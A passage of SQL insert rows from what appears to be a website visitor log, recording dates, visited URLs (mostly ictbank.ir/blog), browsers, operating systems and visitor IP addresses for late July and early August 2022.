(22862,'2022-07-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(22863,'2022-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(22864,'2022-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(22865,'2022-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22866,'2022-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22867,'2022-07-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(22868,'2022-07-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(22869,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22870,'2022-07-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.148','000',0,2,0),
(22871,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.119.81.105','000',0,2,0),
(22872,'2022-07-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(22873,'2022-07-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22874,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(22875,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.97','000',0,4,0),
(22876,'2022-07-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.219.55.143','000',0,1,0),
(22877,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.159.174','000',0,1,0),
(22878,'2022-07-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22879,'2022-07-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.184.228.112','000',0,2,0),
(22880,'2022-07-24','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','116.203.154.251','000',0,1,0),
(22881,'2022-07-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22882,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.73','000',0,4,0),
(22883,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.180.210','000',0,1,0),
(22884,'2022-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,3,0),
(22885,'2022-07-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22886,'2022-07-24','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,2,0),
(22887,'2022-07-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.51.9','000',0,1,0),
(22888,'2022-07-24','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','158.69.23.79','000',0,1,0),
(22889,'2022-07-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,1,0),
(22890,'2022-07-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','216.239.90.19','000',0,1,0),
(22891,'2022-07-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,3,0),
(22892,'2022-07-25','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22893,'2022-07-25','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22894,'2022-07-25','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','185.39.144.147','000',0,2,0),
(22895,'2022-07-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22896,'2022-07-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.46','000',0,1,0),
(22897,'2022-07-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.23','000',0,3,0),
(22898,'2022-07-25','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,3,0),
(22899,'2022-07-25','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','194.36.99.23','000',0,11,0),
(22900,'2022-07-25','http://www.ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','23.90.29.196','000',0,2,0),
(22901,'2022-07-25','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','223.29.254.89','000',0,8,0),
(22902,'2022-07-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,6,0),
(22903,'2022-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.185.101','000',0,1,0),
(22904,'2022-07-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22905,'2022-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(22906,'2022-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22907,'2022-07-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,2,0),
(22908,'2022-07-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.53.66.90','000',0,2,0),
(22909,'2022-07-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22910,'2022-07-26','http://ictbank.ir/blog','Chrome','OS X','10.6.6',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22911,'2022-07-26','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22912,'2022-07-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22913,'2022-07-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,7,0),
(22914,'2022-07-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(22915,'2022-07-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(22916,'2022-07-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.204.136.197','000',0,2,0),
(22917,'2022-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22918,'2022-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(22919,'2022-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22920,'2022-07-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22921,'2022-07-26','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(22922,'2022-07-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.168','000',0,1,0),
(22923,'2022-07-26','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.124','000',0,1,0),
(22924,'2022-07-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.41','000',0,2,0),
(22925,'2022-07-27','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','208.67.106.135','000',0,1,0),
(22926,'2022-07-27','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','194.44.74.169','000',0,2,0),
(22927,'2022-07-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.204.136.197','000',0,2,0),
(22928,'2022-07-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22929,'2022-07-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22930,'2022-07-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','106.75.50.30','000',0,2,0),
(22931,'2022-07-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22932,'2022-07-27','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(22933,'2022-07-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.16','000',0,2,0),
(22934,'2022-07-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(22935,'2022-07-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.233.48','000',0,2,0),
(22936,'2022-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22937,'2022-07-27','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22938,'2022-07-27','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','65.108.151.25','000',0,1,0),
(22939,'2022-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.69.79','000',0,1,0),
(22940,'2022-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.16.1','000',0,1,0),
(22941,'2022-07-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','91.149.225.172','000',0,1,0),
(22942,'2022-07-27','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.67','000',0,3,0),
(22943,'2022-07-27','http://ictbank.ir/blog','Chrome','OS X','10.6.6',NULL,NULL,'','208.80.194.122','000',0,1,0),
(22944,'2022-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.249.58.188','000',0,1,0),
(22945,'2022-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22946,'2022-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22947,'2022-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22948,'2022-07-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22949,'2022-07-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22950,'2022-07-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.225.1.188','000',0,1,0),
(22951,'2022-07-27','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22952,'2022-07-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.96','000',0,8,0),
(22953,'2022-07-28','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','147.78.47.233','000',0,5,0),
(22954,'2022-07-28','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22955,'2022-07-28','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.116.89','000',0,1,0),
(22956,'2022-07-28','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,1,0),
(22957,'2022-07-28','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22958,'2022-07-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(22959,'2022-07-28','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.39','000',0,1,0),
(22960,'2022-07-28','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','143.110.180.98','000',0,1,0),
(22961,'2022-07-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,4,0),
(22962,'2022-07-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22963,'2022-07-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(22964,'2022-07-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.140','000',0,2,0),
(22965,'2022-07-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22966,'2022-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(22967,'2022-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(22968,'2022-07-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,2,0),
(22969,'2022-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(22970,'2022-07-28','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','165.227.179.146','000',0,2,0),
(22971,'2022-07-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.71.64','000',0,1,0),
(22972,'2022-07-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','116.202.209.244','000',0,9,0),
(22973,'2022-07-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,8,0),
(22974,'2022-07-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,1,0),
(22975,'2022-07-29','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','180.215.130.124','000',0,3,0),
(22976,'2022-07-29','http://ifconfig.me/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.185.125.167','000',0,1,0),
(22977,'2022-07-29','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22978,'2022-07-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22979,'2022-07-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.96','000',0,2,0),
(22980,'2022-07-29','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','185.39.144.147','000',0,2,0),
(22981,'2022-07-29','http://wikisonnati.com/blog','Chrome','iOS','12.1',NULL,NULL,'','95.216.217.255','000',0,2,0),
(22982,'2022-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.17.97','000',0,1,0),
(22983,'2022-07-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.101.199','000',0,2,0),
(22984,'2022-07-29','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,1,0),
(22985,'2022-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22986,'2022-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(22987,'2022-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22988,'2022-07-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22989,'2022-07-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.171.251.8','000',0,1,0),
(22990,'2022-07-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.171.251.12','000',0,1,0),
(22991,'2022-07-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.26','000',0,2,0),
(22992,'2022-07-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22993,'2022-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.66','000',0,4,0),
(22994,'2022-07-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22995,'2022-07-30','https://www.bing.com','Chrome','Windows','5.1',NULL,NULL,'','167.71.90.81','000',0,1,0),
(22996,'2022-07-30','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','212.102.33.72','000',0,2,0),
(22997,'2022-07-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22998,'2022-07-30','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','212.102.33.71','000',0,4,0),
(22999,'2022-07-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(23000,'2022-07-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(23001,'2022-07-30','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','147.78.47.233','000',0,7,0),
(23002,'2022-07-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23003,'2022-07-30','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','51.142.175.104','000',0,2,0),
(23004,'2022-07-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.78.8','000',0,1,0),
(23005,'2022-07-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.98.199','000',0,1,0),
(23006,'2022-07-30','http://ictbank.ir/blog','Safari','OS X','10.5.8',NULL,NULL,'','167.99.102.248','000',0,1,0),
(23007,'2022-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(23008,'2022-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(23009,'2022-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(23010,'2022-07-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23011,'2022-07-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(23012,'2022-07-30','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.75','000',0,2,0),
(23013,'2022-07-31','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.126','000',0,4,0),
(23014,'2022-07-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,1,0),
(23015,'2022-07-31','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.121','000',0,3,0),
(23016,'2022-07-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','181.214.218.69','000',0,2,0),
(23017,'2022-07-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23018,'2022-07-31','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(23019,'2022-07-31','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(23020,'2022-07-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,1,0),
(23021,'2022-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.87.16','000',0,1,0),
(23022,'2022-07-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(23023,'2022-07-31','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.174','000',0,1,0),
(23024,'2022-07-31','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','208.67.105.77','000',0,1,0),
(23025,'2022-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.160.160.61','000',0,26,0),
(23026,'2022-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.0.229','000',0,1,0),
(23027,'2022-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(23028,'2022-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(23029,'2022-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(23030,'2022-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.26','000',0,3,0),
(23031,'2022-07-31','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.212.231.5','000',0,2,0),
(23032,'2022-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.97','000',0,2,0),
(23033,'2022-08-01','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','181.214.218.38','000',0,2,0),
(23034,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,2,0),
(23035,'2022-08-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23036,'2022-08-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(23037,'2022-08-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(23038,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.97','000',0,6,0),
(23039,'2022-08-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.88.62.92','000',0,1,0),
(23040,'2022-08-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(23041,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.19.179.131','000',0,1,0),
(23042,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(23043,'2022-08-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(23044,'2022-08-01','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','89.136.38.194','000',0,9,0),
(23045,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.63.218','000',0,1,0),
(23046,'2022-08-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.75.137.54','000',0,2,0),
(23047,'2022-08-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.139','000',0,2,0),
(23048,'2022-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(23049,'2022-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(23050,'2022-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(23051,'2022-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(23052,'2022-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.100.94.84','000',0,1,0),
(23053,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(23054,'2022-08-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(23055,'2022-08-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.201.9.12','000',0,1,0),
(23056,'2022-08-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.172','000',0,1,0),
(23057,'2022-08-02','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.113','000',0,1,0),
(23058,'2022-08-02','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.127','000',0,1,0),
(23059,'2022-08-02','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,3,0),
(23060,'2022-08-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','2.201.145.89','000',0,1,0),
(23061,'2022-08-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.226.252.251','000',0,2,0),
(23063,'2022-08-02','http://www.design-arena.ir/blog','Safari','iOS','13.2.3',NULL,NULL,'','120.41.45.194','000',0,2,0),
(23064,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.97','000',0,4,0),
(23065,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.229.223.193','000',0,2,0),
(23066,'2022-08-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.122','000',0,1,0),
(23067,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(23068,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','211.223.121.239','000',0,1,0),
(23069,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(23070,'2022-08-02','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.126','000',0,4,0),
(23071,'2022-08-02','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','107.182.129.196','000',0,2,0),
(23072,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.91.96','000',0,1,0),
(23073,'2022-08-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.124.5.12','000',0,3,0),
(23074,'2022-08-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.136','000',0,2,0),
(23075,'2022-08-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(23076,'2022-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(23077,'2022-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(23078,'2022-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(23079,'2022-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(23080,'2022-08-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(23081,'2022-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.76','000',0,1,0),
(23082,'2022-08-02','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(23083,'2022-08-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.189.111','000',0,2,0),
(23084,'2022-08-02','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.235.24.22','000',0,2,0),
(23085,'2022-08-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','103.51.147.38','000',0,3,0),
(23086,'2022-08-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','109.206.241.122','000',0,1,0),
(23087,'2022-08-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,7,0),
(23088,'2022-08-03','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(23089,'2022-08-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','109.206.241.122','000',0,4,0),
